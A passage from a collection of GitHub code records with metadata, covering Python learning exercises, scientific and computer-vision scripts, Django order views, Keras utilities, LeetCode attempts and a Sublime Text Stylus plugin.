редко. Начиная с третьей версии Python,\n# эту функцию даже вынесли из встроенных функций в модуль functools.\n#\n#\n#\n# Пример кода с reduce:\n\nfrom functools import reduce\nfrom typing import List\n\n\ndef my_add(a: int, b: int) -> int:\n result = a + b\n print(f\"{a} + {b} = {result}\")\n return result\n\n\nnumbers: List[int] = [0, 1, 2, 3, 4]\nprint(reduce(my_add, numbers))\n#\n#\n#\n# Результат:\n#\n# 0 + 1 = 1\n#\n# 1 + 2 = 3\n#\n# 3 + 3 = 6\n#\n# 6 + 4 = 10\n#\n# 10\n#\n#\n#\n# Используя функцию reduce, реализуйте код, который считает, сколько раз слово was встречается в списке:\n#\n#\n#\nsentences = [\"Nory was a Catholic\", \"because her mother was a Catholic\",\n \"and Nory’s mother was a Catholic\", \"because her father was a Catholic\",\n \"and her father was a Catholic\", \"because his mother was a Catholic\", \"or had been\"]\n\n\ndef check_was(a, b):\n if isinstance(a, str): # обработаем первый элемент отдельно\n a = int(a.count('was'))\n print(a, '************', b)\n result = a + int(b.count('was'))\n return result # т.к. мы возвращаем int - то дальше 'a' всегда будет int-ом, а в 'b' будет новая строка\n\n\nprint(reduce(check_was, sentences))\n\n\n# Задача 1. Минимум и максимум\n#\n# Мы знаем, что для нахождения минимального и максимального значений в наборе данных можно использовать две встроенные функции:\n# min() и max(). И у них тоже можно использовать именованный аргумент key.\n#\n#\n#\n# Скажем, дан вот такой список, в котором хранятся результаты соревнований в виде словарей:\n#\n#\n#\n# grades: Dict[str, Union[str, int]] = [{'name': 'Kenneth', 'score': 3}, {'name': 'Bebe', 'score': 41},\n# {'name': 'Joyce', 'score': 24}, {'name': 'Richard', 'score': 37}, {'name': 'Marian', 'score': 44}, {'name': 'Jana', 'score': 45},\n#\n# {'name': 'Sarah', 'score': 90}, {'name': 'Eddie', 'score': 2}, {'name': 'Mary', 'score': 63},\n#\n# {'name': 'Ronald', 'score': 15}, {'name': 'David', 'score': 44}, {'name': 'Richard', 'score': 78},\n#\n# {'name': 'Warren', 'score': 7}, {'name': 'Alyssa', 'score': 13}, {'name': 'Lloyd', 'score': 52},\n#\n# {'name': 'Vanessa', 'score': 6}, {'name': 'Karen', 'score': 40}, {'name': 'James', 'score': 54},\n#\n# {'name': 'Annie', 'score': 87}, {'name': 'Glenn', 'score': 9}, {'name': 'Bruce', 'score': 68},\n#\n# {'name': 'Ramona', 'score': 64}, {'name': 'Jeannie', 'score': 22}, {'name': 'Aaron', 'score': 3},\n#\n# {'name': 'Ronnie', 'score': 47}, {'name': 'William', 'score': 94}, {'name': 'Sandra', 'score': 40},\n#\n# ]\n#\n#\n#\n# Напишите код, который выводит на экран минимальное и максимальное количество очков из этого списка.\n# Используйте только встроенные функции и лямбда-функции, то есть реализуйте решение «в две строки».\n#\n#\n#\n\ngrades = [\n {'name': 'Kenneth', 'score': 3}, {'name': 'Bebe', 'score': 41}, {'name': 'Joyce', 'score': 24},\n {'name': 'Richard', 'score': 37}, {'name': 'Marian', 'score': 44}, {'name': 'Jana', 'score': 45},\n {'name': 'Sarah', 'score': 90}, {'name': 'Eddie', 'score': 2}, {'name': 'Mary', 'score': 63},\n {'name': 'Ronald', 'score': 15}, {'name': 'David', 'score': 44}, {'name': 'Richard', 'score': 78},\n {'name': 'Warren', 'score': 7}, {'name': 'Alyssa', 'score': 13}, {'name': 'Lloyd', 'score': 52},\n {'name': 'Vanessa', 'score': 6}, {'name': 'Karen', 'score': 40}, {'name': 'James', 'score': 54},\n {'name': 'Annie', 'score': 87}, {'name': 'Glenn', 'score': 9}, {'name': 'Bruce', 'score': 68},\n {'name': 'Ramona', 'score': 64}, {'name': 'Jeannie', 'score': 22}, {'name': 'Aaron', 'score': 3},\n {'name': 'Ronnie', 'score': 47}, {'name': 'William', 'score': 94}, {'name': 'Sandra', 'score': 40},\n]\n# Решение через key\nprint(max(grades, key=lambda x: x[\"score\"]))\nprint(min(grades, key=lambda x: x[\"score\"]))\n# Вывод исключительно очков:\nprint(max(grades, key=lambda x: x[\"score\"])['score'])\nprint(min(grades, key=lambda x: x[\"score\"])['score'])\n\n# Решение через map, который будет изучен в следующем модуле\nprint(list(map(lambda x: x['score'], grades))) # для наглядности\nprint(max(map(lambda x: x['score'], grades)))\nprint(min(map(lambda x: x['score'], grades)))\nprint(grades)\n\n# Задача 2. Сортировка\n#\n# Таблица базы данных состоит из строк, в которых хранится информация о каждом человеке: его имя, возраст и остальные данные.\n# Вас попросили реализовать для этой базы сортировку по возрасту (по убыванию и по возрастанию).\n#\n# Реализуйте класс Person с соответствующей инициализацией, а также сеттерами и геттерами.\n# Затем создайте список из хотя бы трёх людей и отсортируйте их. Для сортировки используйте лямбда-функцию.\n\nclass Person:\n def __init__(self, name, age):\n self._name = name\n self._age = age\n\n @property\n def name(self):\n return self._name\n\n @property\n def age(self):\n return self._age\n\n @age.setter\n def age(self, value):\n self._age = value\n\n @name.setter\n def name(self, word):\n self._name = word\n\n def __repr__(self):\n return f\"({self.name}, {self.age})\"\n\n\nfirst = Person(\"Max\", 29)\nsecond = Person(\"Christine\", 21)\nthird = Person(\"Anthony\", 35)\nhumans = [first, second, third]\nprint(humans)\nhumans.sort(key=lambda x: x.age)\nprint(humans)\nhumans.sort(key=lambda x: x.age, reverse=True)\nprint(humans)\nhumans.sort(key=lambda x: x.age)\nprint(humans)\nhumans.sort(key=lambda x: -x.age)\nprint(humans)\n\nmy_list = [Person('Name', 10), Person('Name', 1), Person('Name', 3)]\nprint(my_list)\nmy_list_sorted = sorted(my_list, key=lambda x: x.age)\nprint(my_list_sorted)\n\n# Задача 1. Счётчик 2\n#\n# Как-то мы уже создавали декоратор counter, который считает и выводит количество вызовов декорируемой функции.\n# Для этого мы использовали интересную особенность классов. В этот раз реализуйте тот же декоратор,\n# но уже с использованием знаний о локальных и глобальных переменных.\n#\n# Реализуйте декоратор двумя способами:\n#\n# используя глобальную переменную count;\n# используя локальную переменную count внутри декоратора.\n#\n#\n# Дополнительно: найдите команду (в интернете или даже сами), которая перечисляет все функции и методы,\n# находящиеся во встроенном пространстве имён в Python.\n#\n#\n#\n# Результат выполнения команды:\n#\n# ['__class__', '__class_getitem__', '__contains__', '__delattr__', '__delitem__', '__dir__' ну и так далее.\n\nglobal_count = {}\ncount = 0\n\n\ndef decorator_counter(func):\n def wrapped_func(*args, **kwargs):\n global count\n count += 1\n wrapped_func.count += 1\n global_count[func.__name__] = global_count.get(func.__name__, 0) + 1\n return func(*args, **kwargs)\n\n wrapped_func.count = 0\n return wrapped_func\n\n\n@decorator_counter\ndef hello():\n print('hello')\n\n\n@decorator_counter\ndef hello_2():\n print('hello')\n\n\nprint(global_count, hello.count, hello_2.count)\nhello()\nprint(global_count, hello.count, hello_2.count)\nhello_2()\nprint(global_count, hello.count)\nprint(count)\nprint('*' * 100)\nprint(dir('.'))\nprint('*' * 100)\nprint(locals())\nprint('*' * 100)\nprint(globals())\n","repo_name":"gnatagnaro/Python_Basic","sub_path":"Module30/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10085,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"40922219364","text":"import dash\nimport dash_html_components as html\nimport dash_vtk\nimport pyvista as pv\nfrom dash_vtk.utils import to_mesh_state\nfrom pyvista import examples\ntry:\n # VTK 9+\n from vtkmodules.vtkImagingCore import vtkRTAnalyticSource\nexcept ImportError:\n # VTK =< 8\n from vtk.vtkImagingCore import vtkRTAnalyticSource\n\n\n# Use VTK to get some data\ndata_source = vtkRTAnalyticSource()\nprint(type(data_source))\ndata_source.Update() # <= Execute source to produce an output\ndataset = data_source.GetOutput()\n\n#Reading STL files with pyvista .... \nmesh_pv = pv.read(r'C:/Users/Public/PI/Microscope/E-727/GCS_LabVIEW/MicrofabricationSoftware/3D_examples_models/dinolowRes.stl')\n#grafon = examples.download_dragon()\n# Use helper to get a mesh structure that can be passed as-is to a Mesh\n# RTData is the name of the field\nmesh_state = to_mesh_state(mesh_pv)\n\nprint(\"Mesh state\", type(mesh_state))\ncontent = dash_vtk.View([\n dash_vtk.GeometryRepresentation([\n dash_vtk.Mesh(state=mesh_state)\n ]),\n])\n\n# Dash setup\napp = dash.Dash(__name__)\nserver = app.server\n\napp.layout = html.Div(\n style={\"width\": \"100%\", \"height\": \"400px\"},\n children=[content],\n)\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"Riloro/Two_Photon_Polymerization","sub_path":"MicrofabricationSoftware/scriptFabrication.py","file_name":"scriptFabrication.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"30460370743","text":"import cv2\nimport glob\nimport random\nimport numpy as np\nimport os\n\ndef save_detected_image(img, filename):\n if 'b' in filename:\n cv2.imwrite(f'detected/1/{filename}', img)\n if 'c' in filename:\n cv2.imwrite(f'detected/2/{filename}', img)\n if 'b' not in filename and 'c' not in filename:\n cv2.imwrite(f'detected/0/{filename}', img)\n\n\ndef main():\n net = cv2.dnn.readNet('weights/yolov4-lp2_best.weights', 'yolov4-lp2.cfg')\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n model = cv2.dnn_DetectionModel(net)\n model.setInputParams(size=(608, 608), scale=1/255)\n\n zero_images = glob.glob('alldataset/0/*.jpg')\n one_images = glob.glob('alldataset/1/*.jpg')\n two_images = glob.glob('alldataset/2/*.jpg')\n all_images = zero_images + one_images + two_images\n random.shuffle(all_images)\n\n for image in all_images:\n img = cv2.imread(image)\n classes, confidences, boxes = model.detect(img, 0.2, 0.2)\n if len(classes) == 0:\n save_detected_image(img, os.path.basename(image))\n continue\n for class_id, confidence, box in zip(classes.flatten(), confidences.flatten(), boxes):\n label = '%.2f' % confidence\n label = '%s: %s' % (names[class_id], label)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n left, top, width, height = box\n top = max(top, labelSize[1])\n cv2.rectangle(img, box, color=(0, 255, 0), thickness=2)\n cv2.rectangle(img, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv2.FILLED)\n cv2.putText(img, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))\n save_detected_image(img, os.path.basename(image))\n\n\nif __name__ == '__main__':\n main()","repo_name":"cuddly-goggles/anpr","sub_path":"detected.py","file_name":"detected.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"93"}
+{"seq_id":"2387619511","text":"from PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport os\nfrom interface.src.Piano import Piano\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\n\ndef resource_path(relative_path):\n base_path = getattr(sys, '_MEIPASS',\n os.path.dirname(os.path.abspath(__file__))\n )\n return os.path.join(base_path, relative_path)\n\nclass Interface(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setCentralWidget(Piano())\n self.resize(1500, 750)\n self.move(5, 125)\n self.setFixedSize(self.width(), self.height())\n self.setWindowIcon(QIcon(resource_path('icon/gramophone.png')))\n self.setWindowTitle('MusicCritique Interface')\n self.show()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Interface()\n ex.setWindowOpacity(0.95)\n sys.exit(app.exec_())","repo_name":"josephding23/SimplePianoUI","sub_path":"interface/src/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"93"}
+{"seq_id":"21354416918","text":"\"\"\"Modified from 'Basic example 1 for eFEL'.\"\"\"\r\n\r\nimport efel\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\n\r\ndef avg_and_rms(x):\r\n N = len(x)\r\n avgx = numpy.mean(x)\r\n rmsx = 0\r\n for i in range(N):\r\n rmsx += (avgx-x[i])**2\r\n rmsx = numpy.sqrt(rmsx/(N-1))\r\n return avgx,rmsx\r\n\r\ndef main(filename,idelay,idur):\r\n \"\"\"Main\"\"\"\r\n\r\n # Use numpy to read the trace data from the txt file\r\n data = numpy.loadtxt(filename)\r\n\r\n # Time is the first column\r\n time = data[:, 0]\r\n # Voltage is the second column\r\n voltage = data[:, 1]\r\n \r\n # Now we will construct the datastructure that will be passed to eFEL\r\n\r\n # A 'trace' is a dictionary\r\n trace1 = {}\r\n\r\n # Set the 'T' (=time) key of the trace\r\n trace1['T'] = time\r\n\r\n # Set the 'V' (=voltage) key of the trace\r\n trace1['V'] = voltage\r\n\r\n # Set the 'stim_start' (time at which a stimulus starts, in ms)\r\n # key of the trace\r\n # Warning: this need to be a list (with one element)\r\n trace1['stim_start'] = [idelay]\r\n\r\n # Set the 'stim_end' (time at which a stimulus end) key of the trace\r\n # Warning: this need to be a list (with one element)\r\n trace1['stim_end'] = [idelay+idur]\r\n\r\n # Multiple traces can be passed to the eFEL at the same time, so the\r\n # argument should be a list\r\n traces = [trace1]\r\n\r\n # Now we pass 'traces' to the efel and ask it to calculate the feature\r\n # values\r\n traces_results = efel.getFeatureValues(traces,\r\n ['peak_time','AP_amplitude', 'AP_duration_half_width', 'Spikecount', 'voltage_base'])\r\n ###### This is only printing. I do not really need it when I'm looping ##############\r\n '''\r\n # The return value is a list of trace_results, every trace_results\r\n # corresponds to one trace in the 'traces' list above (in same order)\r\n for trace_results in traces_results:\r\n # trace_result is a dictionary, with as keys the requested features\r\n for feature_name, feature_values in trace_results.items():\r\n #print('feature_values:',feature_values)\r\n if len(feature_values)!=0: # I changed this from if feature_values!=None:\r\n print(\"Feature %s has the following values: %s\" % \\\r\n (feature_name, ', '.join([str(x) for x in feature_values])))\r\n '''\r\n #####################################################################################\r\n trace_results = traces_results[0] # Because I am only looping over one cell, I guess\r\n # treat data and perform avg,rms where needed\r\n avg_AP_ampl, rms_AP_ampl = avg_and_rms(trace_results[\"AP_amplitude\"])\r\n avg_AP_halfwidth, rms_AP_halfwidth = avg_and_rms(trace_results[\"AP_duration_half_width\"])\r\n Nspikes = trace_results[\"Spikecount\"]\r\n Nspikes = Nspikes[0]\r\n return Nspikes, avg_AP_ampl, rms_AP_ampl, avg_AP_halfwidth, rms_AP_halfwidth\r\n\r\n\r\nif __name__ == '__main__':\r\n testmodel = 496497595 # 488462965 #\r\n idur = 1000 # ms\r\n idelay = 1\r\n iamp = 0.02 # nA\r\n v_init = -70 #-86.5 # mV\r\n Ra = 100 # -150\r\n somasize = 10\r\n \r\n # Default HH values:\r\n ena = 50\r\n ek = -77\r\n el_hh = -54.3\r\n gnabar_hh = 0.12\r\n gkbar_hh = 0.036\r\n gl_hh = 0.0003\r\n \r\n ### Change HH values here: ####\r\n #ena = 20\r\n #ek = -70\r\n #el_hh = -70\r\n #gnabar_hh = 0.14\r\n #gkbar_hh = 0.036*2\r\n #gl_hh = 0.000003\r\n \r\n iamps = [0.02,0.04,0.06,0.08,0.1,0.12,0.14,0.16,0.18]\r\n cms = [0.8,0.9,1.0,1.1,1.2,1.25,1.3,1.4,1.5]\r\n \r\n NCms = len(cms)\r\n Namps = len(iamps)\r\n slopes = numpy.zeros(Namps)\r\n \r\n outfolder = 'Results/IStim/Soma%i/Vary_iamp/'%somasize\r\n outfilename = outfolder+'Cmslopes_vs_iamp.txt'\r\n plotname = outfolder+'Cmslopes_vs_iamp.png'\r\n outfile = open(outfilename,'w')\r\n for k in range(Namps):\r\n iamp = iamps[k]\r\n Nspikes = numpy.zeros(NCms)\r\n avg_AP_ampl = numpy.zeros(NCms)\r\n rms_AP_ampl = numpy.zeros(NCms)\r\n avg_AP_halfwidth = numpy.zeros(NCms)\r\n rms_AP_halfwidth = numpy.zeros(NCms)\r\n \r\n # Set names\r\n hhstring = '_ena'+str(ena)+'_ek'+str(ek)+'_el'+str(el_hh)+'_gnabar'+str(gnabar_hh)+'_gkbar'+str(gkbar_hh)+'_gl'+str(gl_hh)\r\n folder = 'Results/IStim/Soma%i/current_idur'%somasize+str(idur)+'_iamp'+str(iamp)+'/'\r\n # make files\r\n for j in range(NCms):\r\n print('Step ', j+1, ' of', NCms)\r\n cm = cms[j]\r\n filename = folder+'somaonly_cm'+str(cm)+'_idur%i_iamp'%idur+str(iamp)+hhstring+'_Ra'+str(Ra)+'_vinit'+str(v_init)+'_V.txt' \r\n Nspikes[j], avg_AP_ampl[j], rms_AP_ampl[j], avg_AP_halfwidth[j], rms_AP_halfwidth[j] = main(filename,idelay,idur)\r\n \r\n a = (Nspikes[2]-Nspikes[0])/(cms[2]-cms[0])\r\n print('Slope, iamp=',iamp, ': ', a) # Loop this?\r\n slopes[k] = a\r\n outfile.write('%.2f %.2e\\n' % (iamp,a))\r\noutfile.close()\r\n\r\nplt.figure(figsize=(6,5))\r\nplt.plot(iamps,slopes,'-o')\r\nplt.xlabel(r'$I$ (nA)')\r\nplt.ylabel(r'Slope (Hz cm$^2$/$\\mu$F)')\r\nplt.savefig(plotname)\r\nplt.show()\r\n","repo_name":"KineOdegardHanssen/PhD-subprojects","sub_path":"P3_NEURON/efel_analysis_varyCm_all_somaonly_varyhh_findslopes.py","file_name":"efel_analysis_varyCm_all_somaonly_varyhh_findslopes.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"}
+{"seq_id":"38648935335","text":"import matplotlib.pyplot as pyplot\nimport shutil\nimport keras\nimport json\nimport datetime\nimport psutil\nimport os\nimport time\nimport operator\n\nfrom keras_preprocessing.sequence import pad_sequences\nimport numpy as np\n\ndef valid_char(ch):\n return ch >= 'A' and ch <= 'Z' or ch.isspace() or ch >= '0' and ch <= '9'\n\ndef valid_string(name):\n return all([valid_char(ch) for ch in name])\n\n# for some reason these two functions are way faster than the keras char-level tokenizer\ndef map_char_to_int(texts,labels):\n char_counts = {}\n for text in texts:\n for char in text:\n char_counts[char] = char_counts[char] + 1 if char in char_counts else 1\n for char in labels:\n char_counts[char] = char_counts[char] + 1 if char in char_counts else 1\n char_counts_sorted = sorted(char_counts.items(), key=operator.itemgetter(1), reverse=True)\n char_to_int = {}\n int_to_char = ['?'] # reverse index\n for i, row in enumerate(char_counts_sorted):\n char_to_int[row[0]] = i + 1\n int_to_char.append(row[0])\n return char_to_int, int_to_char\n\n\n# for some reason these two functions are way faster than the keras char-level tokenizer\ndef texts_to_sequences(texts, char_to_int):\n sequences = []\n for text in texts:\n sequences.append([char_to_int[char] for char in text])\n return sequences\n\ndef save_training_plots(model_path):\n history = json.load(open(model_path + '/history.json'))\n\n for i in range(0, len(history['val_loss'])):\n history['val_loss'][i] = round(history['val_loss'][i], 3)\n history['val_acc'][i] = round(history['val_acc'][i], 3)\n history['loss'][i] = round(history['loss'][i], 3)\n history['acc'][i] = round(history['acc'][i], 3)\n\n pyplot.plot(history['acc'])\n pyplot.plot(history['val_acc'])\n pyplot.title('accuracy')\n pyplot.ylabel('accuracy')\n pyplot.xlabel('epoch')\n pyplot.legend(['train', 'validate'], loc='upper left')\n pyplot.savefig(model_path + '/acc.png', dpi=300)\n pyplot.clf() # I'm commenting that this means \"clear\" because it's a silly method name\n\n pyplot.plot(history['loss'])\n pyplot.plot(history['val_loss'])\n pyplot.title('loss')\n pyplot.ylabel('loss')\n pyplot.xlabel('epoch')\n pyplot.legend(['train', 'validate'], loc='upper left')\n pyplot.savefig(model_path + '/loss.png', dpi=300)\n pyplot.clf()\n\n\ndef save_history_file(model_path, history):\n with open(model_path + '/history.json', 'w') as handle:\n json.dump(history, handle)\n\n\ndef copy_model_to_latest(base_path, model_path, model_name):\n try:\n shutil.rmtree(base_path + '/' + model_name + '_latest')\n except:\n pass\n shutil.copytree(model_path, base_path + '/' + model_name + '_latest')\n\n\nclass SaveHistoryCheckpoint(keras.callbacks.Callback):\n def __init__(self, model_path, **kargs):\n super(SaveHistoryCheckpoint, self).__init__(**kargs)\n self.model_path = model_path\n self.init_time = time.time()\n self.history = {\n 'loss': [],\n 'acc': [],\n 'val_loss': [],\n 'val_acc': [],\n 'time': [],\n 'training_time': 0,\n #'total_time': total_time(),\n #'peak_memory': get_memory()\n }\n\n def on_epoch_end(self, epoch, logs={}):\n index = len(self.history)\n self.history['loss'].append(logs.get('loss'))\n self.history['acc'].append(logs.get('acc'))\n self.history['val_loss'].append(logs.get('val_loss'))\n self.history['val_acc'].append(logs.get('val_acc'))\n self.history['time'].append(time.time() - (self.history['time'][index - 1] if index else self.init_time))\n self.history['training_time'] = time.time() - self.init_time\n #self.history['total_time'] = total_time()\n #self.history['peak_memory'] = get_memory()\n save_history_file(self.model_path, self.history)\n save_training_plots(self.model_path)\n\ndef convert_problem_to_name_input(holds):\n # encode each problem as csv list of holds, followed by space, then name of the problem\n inp = []\n hold_string = ','.join([hold['Description'] for hold in holds])\n hold_string += ' '\n return hold_string\n\ndef sample_from_prob_vec(pr):\n # sample from output of model (ignoring very rare outcomes)\n prob_thresh = np.max(pr,1) * 0.1\n pr[pr < prob_thresh]=0\n pr = (pr/pr.sum(axis=1,keepdims=1))[0]\n idxs = np.arange(len(pr))\n return np.random.choice(idxs, 1, p=pr)[0]\n\n# Take \"hold text (like 'A5,B8,D12,F14,I18 ' or output of `convert_problem_to_name_input` and output a name)\ndef name_text(text, model, char_to_int, int_to_char, max_length, end_token, prefix=None):\n orig_len = len(text)\n if prefix is not None:\n prefix = prefix.upper()\n if valid_string(prefix):\n text += prefix\n texts = [text]\n #single\n # for each text, continue predicting until we reach max length or end token\n final_texts = texts\n while True:\n\n sequences = texts_to_sequences(final_texts, char_to_int)\n data = pad_sequences(sequences, maxlen=max_length)\n predictions_list = model.predict(data)\n\n ch = sample_from_prob_vec(predictions_list)\n if len(sequences[0]) > max_length or ch == end_token:\n break\n final_texts[0]+=int_to_char[ch]\n return final_texts[0][orig_len:]\n","repo_name":"markmliu/moonboard_nn","sub_path":"names/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"3379288081","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.core.paginator import Paginator\nfrom inventory.forms import OrderForm, OrderItemsFormSet\nfrom inventory.models import Order, OrderItems, OrderNotes\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\n\n\n@login_required\ndef order_list(request):\n orders = Order.objects.all()\n paginator = Paginator(orders, 5)\n\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n title = 'Orders'\n context = {'orders': orders, 'title': title, 'page_obj': page_obj}\n\n return render(request, 'inventory/order/orders.html', context)\n\n\n@login_required\ndef create_order(request):\n form = OrderForm(request.POST or None)\n\n if request.method == 'POST':\n if form.is_valid():\n instance = form.save(commit=False)\n instance.issued_by = request.user\n instance.save()\n messages.add_message(request, messages.SUCCESS, \"Order created.\")\n\n return redirect(reverse('edit_order', instance.id))\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n\n title = 'Create Order'\n context = {'form': form, 'title': title}\n return render(request, 'inventory/order/order_form.html', context)\n\n\ndef edit_order(request, oid=None):\n title = 'Edit Order'\n context = {}\n try:\n order = Order.objects.get(pk=oid)\n form = OrderForm(instance=order)\n formset = OrderItemsFormSet(queryset=OrderItems.objects.filter(order=order))\n\n if request.method == 'POST':\n if request.POST.get('form-TOTAL_FORMS') is None:\n form = OrderForm(request.POST or None, instance=order)\n\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.SUCCESS, \"Order updated.\")\n return redirect('edit_order', order.id)\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n else:\n formset = OrderItemsFormSet(request.POST, request.FILES)\n if formset.is_valid():\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.order = order\n instance.save()\n\n for deleted_item in formset.deleted_objects:\n deleted_item.delete()\n\n messages.add_message(request, messages.SUCCESS, \"Order items updated.\")\n return redirect('edit_order', order.id)\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n\n context = {'form': form, 'formset': formset, 'order': order, 'title': title}\n except Order.DoesNotExist:\n raise Http404(\"Order does not exist\")\n return render(request, \"inventory/order/order_form.html\", context)\n\n\n","repo_name":"dax1216/inventory-py","sub_path":"inventory/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"26712138185","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n return str(int(\"\".join(str(k) for k in digits)) + 1).split(\" \")[0]\n\n\nclass Zeroes:\n def moveZeroes(self, nums):\n non_zero_index = 0\n for i, num in enumerate(nums):\n if num != 0:\n nums[non_zero_index] = nums[i]\n non_zero_index += 1\n\n\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n start = 0\n end = len(s)\n while start < end:\n temp = s[end]\n s[end] = s[start]\n s[start] = temp\n start += 1\n end -= 1","repo_name":"konstantinosBlatsoukasRepo/leet_code","sub_path":"easy/66_plus_one.py","file_name":"66_plus_one.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"2693763031","text":"import os.path\r\nimport re\r\nimport subprocess\r\nimport os\r\nimport sublime\r\nimport sublime_plugin\r\n\r\nclass StylusCompileCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().compile()\r\n\r\nclass StylusCompressCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().compress()\r\n\r\nclass StylusWatchCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().watch()\r\n\r\nclass RutasStylus:\r\n\tdef rutaAtributos():\r\n\t\tpathStylus=os.path.join(sublime.packages_path(), \"stylus\", \"stylus.json\")\r\n\t\tRutasStylus.verificarRuta(pathStylus)\r\n\t\treturn pathStylus\r\n\r\n\tdef verificarRuta(ruta):\r\n\t\tif not os.path.exists(ruta):\r\n\t\t\topen(ruta, \"w\").close()\r\n\r\nclass ArchivoStylus:\r\n\tdef cargar():\r\n\t\td=sublime.decode_value(open(RutasStylus.rutaAtributos()).read())\r\n\t\tif d==None:\r\n\t\t\td={\"atributos\":{}, \"etiquetas\":[]}\r\n\t\treturn d\r\n\r\n\tdef allEtiquetas():\r\n\t\treturn ArchivoStylus.cargar()[\"etiquetas\"]\r\n\t\r\n\tdef allAtributos():\r\n\t\treturn list(ArchivoStylus.cargar()[\"atributos\"].keys())\r\n\r\n\r\n\tdef allValores(etiqueta):\r\n\t\td=ArchivoStylus.cargar()[\"atributos\"]\r\n\t\tif d.get(etiqueta):\r\n\t\t\treturn d[etiqueta]\r\n\r\n\tdef guardar(d):\r\n\t\topen(RutasStylus.rutaAtributos(), \"w\").write(sublime.encode_value(d, True))\r\n\r\n\tdef agregar(etiquetas, atributos):\r\n\t\td=ArchivoStylus.cargar()\r\n\t\td[\"etiquetas\"]=list(set(d[\"etiquetas\"]) | set(etiquetas))\r\n\t\tfor atributo in atributos:\r\n\t\t\tif not d[\"atributos\"].get(atributo):d[\"atributos\"][atributo]=[]\r\n\t\t\td[\"atributos\"][atributo]=list(set(d[\"atributos\"][atributo])|atributos[atributo])\r\n\t\tArchivoStylus.guardar(d)\r\n\r\nclass Stylus:\r\n\tdef __init__(self):\r\n\t\tself.filename=sublime.active_window().active_view().file_name()\r\n\t\tif self.filename:\r\n\t\t\tos.chdir(os.path.dirname(self.filename))\r\n\t\r\n\tdef compile(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus %s\"%os.path.basename(self.filename))\r\n\r\n\tdef compress(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -c %s\"%os.path.basename(self.filename))\r\n\r\n\tdef watch(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -w %s\"%os.path.basename(self.filename))\r\n\r\n\tdef comando(self, comando):\r\n\t\treturn comando if sublime.platform()==\"windows\" else \"gnome-terminal -x bash -c '%s'\"%(comando)\r\n\r\n\tdef ejecutar(self, comando, shell=True):\r\n\t\tproceso=subprocess.Popen(self.comando(comando), shell=shell, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\r\n\t\tif proceso.communicate()[1]:\r\n\t\t\terror=proceso.communicate()[1].decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"MAL \"+error)\r\n\t\t\tprint(error)\r\n\t\telse:\r\n\t\t\tsalida=proceso.communicate()[0].decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"BIEN\"+salida)\r\n\t\t\treturn salida\r\n\r\nclass StylusListener(sublime_plugin.EventListener):\r\n\tdef on_query_completions(self, view, prefix, locations):\r\n\t\tif not view.scope_name(0).startswith(\"source.stylus \"):return\r\n\t\tpunto=view.sel()[0].a\r\n\t\tlinea=view.substr(sublime.Region(view.line(punto).a, punto))\r\n\t\tif re.match(\"^[\\w]*$\", linea):\r\n\t\t\treturn [(e+\"\\t•\", e) for e in ArchivoStylus.allEtiquetas()]\r\n\t\telif re.match(\"^\\s+[\\w-]*$\", linea):\r\n\t\t\treturn [(a+\"\\t•\", a) for a in ArchivoStylus.allAtributos()]\r\n\t\telif 